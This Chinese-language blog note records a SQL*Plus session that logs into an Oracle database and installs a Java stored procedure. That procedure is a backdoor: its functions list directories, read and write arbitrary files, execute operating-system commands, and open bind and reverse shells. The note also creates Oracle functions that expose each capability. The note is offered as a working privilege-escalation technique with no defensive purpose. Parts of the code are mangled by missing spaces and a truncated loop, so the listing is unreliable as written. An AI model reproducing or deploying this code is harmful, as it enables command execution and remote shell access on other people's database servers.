连接oracle后提权,利用Oracle漏洞提权笔记

C:/WINDOWS/system32>sqlplus /nolog

SQL*Plus: Release9.2.0.1.0- Productionon星期日8月3114:01:432008

SQL> conn ysreal/ysreal@(description=(address_list=(address=(protocol=tcp)(host=

10.100.0.239)(port=1521)))(connect_data=(SERVICE_NAME=WORK)));

已连接。

SQL>

SQL> createorreplaceandcompile java source named paeqas

2import java.io.*;

3import java.net.*;

4publicclassPAEQ{

5 public static String listFolder(String path){

6 File f=null;

7 String str="";

8 f=new File(path);

9 String[] files=f.list();

10 if(files!=null)

11 for(int i=0;i

12 str+=files[i]+"/r/n";

13 }

14return str;

15}

16publicstatic String saveFile(String filepath,String value){

17 FileOutputStream fos=null;

18 try {

19 fos=new FileOutputStream(filepath);

20 fos.write(value.getBytes());

21 return "OK";

22 }catch (Exception e){

23 return e.getMessage();

24 }finally{

25 if(fos!=null){

26 try {fos.close();}catch (Exception e){}

27}

28}

29}

30publicstatic String readFile(String pathfile,String code){

31 BufferedReader br=null;

32 String value="";

33 try {

34 br=new BufferedReader(new InputStreamReader(new FileInputStream(pathfile

),code));

35 String s=null;

36 while((s=br.readLine())!=null){

37 value+=s;

38 }

39return value;

40} catch (Exception e){

41 return e.getMessage();

42 }finally{

43 if(br!=null){try {br.close();}catch (IOException e){}}

44}

45}

46publicstatic String execFile(String filepath,String code){

47 int i=0;

48 Runtime rt=Runtime.getRuntime();

49 String output="";

50 InputStreamReader isr = null;

51 char[] bufferC=new char[1024];

52 try{

53 Process ps=rt.exec(filepath);

54 isr=new InputStreamReader(ps.getInputStream(),code);

55 while((i=isr.read(bufferC,0,bufferC.length))!=-1){

56 output+=new String(bufferC,0,i);

57 }

58return output;

59}catch(Exception e){

60 return e.getMessage();

61 }finally{

62 if(isr!=null)try {isr.close();}catch (IOException e){}

63}

64}

65publicstatic String bindShell(int port){

66 ServerSocket ss=null;

67 Socket s=null;

68 try {

69 ss = new ServerSocket(port);

70 s=ss.accept();

71 new optShell(ss,s).start();

73 return "OK";

74 }catch (Exception e){

75 return e.getMessage();

76 }

77}

78publicstatic String reverseShell(String host,int port){

79 Socket s=null;

80 try{

81 s=new Socket(host,port);

82 new optShell(null,s).start();

83 return "OK";

84 }catch(Exception e){

85 return e.getMessage();

86 }

87}

88publicstaticclassoptShell extends Thread{

89 OutputStream os=null;

90 InputStream is=null;

91 ServerSocket ss;

92 Socket s;

93 public optShell(ServerSocket ss,Socket s){

94 this.ss=ss;

95 this.s=s;

96 try{

97 this.is=s.getInputStream();

98 this.os=s.getOutputStream();

99 }catch(Exception e){

100 if(os!=null)try {os.close();}catch(Exception ex){}

101if(is!=null)try{is.close();}catch(Exception ex){}

102if(s!=null)try{s.close();}catch(Exception ex){}

103if(ss!=null)try{ss.close();}catch(Exception ex){}

104}

105}

106publicvoid run(){

107 BufferedReader br=new BufferedReader(new InputStreamReader(is));

108 String line="";

109 String cmdhelp="Command:/r/nlist /r/nsave/r/nread/r/nexec/r/nexit/r/n";

110 try {

111 //os.write(cmdhelp.getBytes());

112 line=br.readLine();

113 while(!"exit".equals(line)){

114 if(line.length()>3){

115 StringBuffer sb=new StringBuffer(line.trim());

116 String cmd=sb.substring(0, 4);

117 if(cmd.equals("list")){

118 os.write("input you path:/r/n".getBytes());

119 line=br.readLine();

120 os.write(listFolder(line).getBytes());

121 }elseif("save".equals(cmd)){

122 os.write("input you filepath:/r/n".getBytes());

123 line=br.readLine();

124 os.write("input you value:/r/n".getBytes());

125 os.write(saveFile(line,br.readLine()).getBytes());

126 }elseif("read".equals(cmd)){

127 os.write("input you filepath:/r/n".getBytes());

128 line=br.readLine();

129 os.write("input you code examle:GBK/r/n".getBytes());

130 os.write(readFile(line,br.readLine()).getBytes());

131 }elseif("exec".equals(cmd)){

132 os.write("input you run filepath:/r/n".getBytes());

133 line=br.readLine();

134 os.write("input you code examle:GBK/r/n".getBytes());

135 os.write(execFile(line,br.readLine()).getBytes());

136 }else{

137 os.write(cmdhelp.getBytes());

138 }

139}else{

140 os.write(cmdhelp.getBytes());

141 }

142line=br.readLine();

143}

144} catch (Exception e){

145 e.printStackTrace();

146 }finally{

147 if(os!=null)try {os.close();}catch(Exception e){}

148if(is!=null)try{is.close();}catch(Exception e){}

149if(s!=null)try{s.close();}catch(Exception e){}

150if(ss!=null)try{ss.close();}catch(Exception e){}

151}

152}

153}

154}

155/

Java 已创建。

SQL> createorreplacefunctionPAEQ_LISTFOLDER(str varchar2) return varchar2

2aslanguage java name 'PAEQ.listFolder(java.lang.String) return java.lang.S

tring';

函数已创建。

SQL> createorreplacefunctionPAEQ_SAVEFILE(p varchar2,v varchar2) return varc

har2

2aslanguage java name 'PAEQ.saveFile(java.lang.String,java.lang.String) ret

urn java.lang.String';

函数已创建。

SQL> createorreplacefunctionPAEQ_READFILE(p varchar2,c varchar2) return varc

har2

2aslanguage java name 'PAEQ.readFile(java.lang.String,java.lang.String) ret

urn java.lang.String';

函数已创建。

SQL> createorreplacefunctionPAEQ_EXECFILE(fp varchar2,c varchar2) returnvar

char2

2aslanguage java name 'PAEQ.execFile(java.lang.String,java.lang.String) ret

urn java.lang.String';

函数已创建。

SQL> createorreplacefunctionPAEQ_BINDSHELL(port number) return varchar2

2aslanguage java name'PAEQ.bindShell(int) return java.lang.String';/

警告: 创建的函数带有编译错误。

SQL> createorreplacefunctionPAEQ_BINDSHELL(port number) return varchar2

2aslanguage java name'PAEQ.bindShell(int) return java.lang.String';

函数已创建。

连接oracle后提权,利用Oracle漏洞提权笔记 | 学步园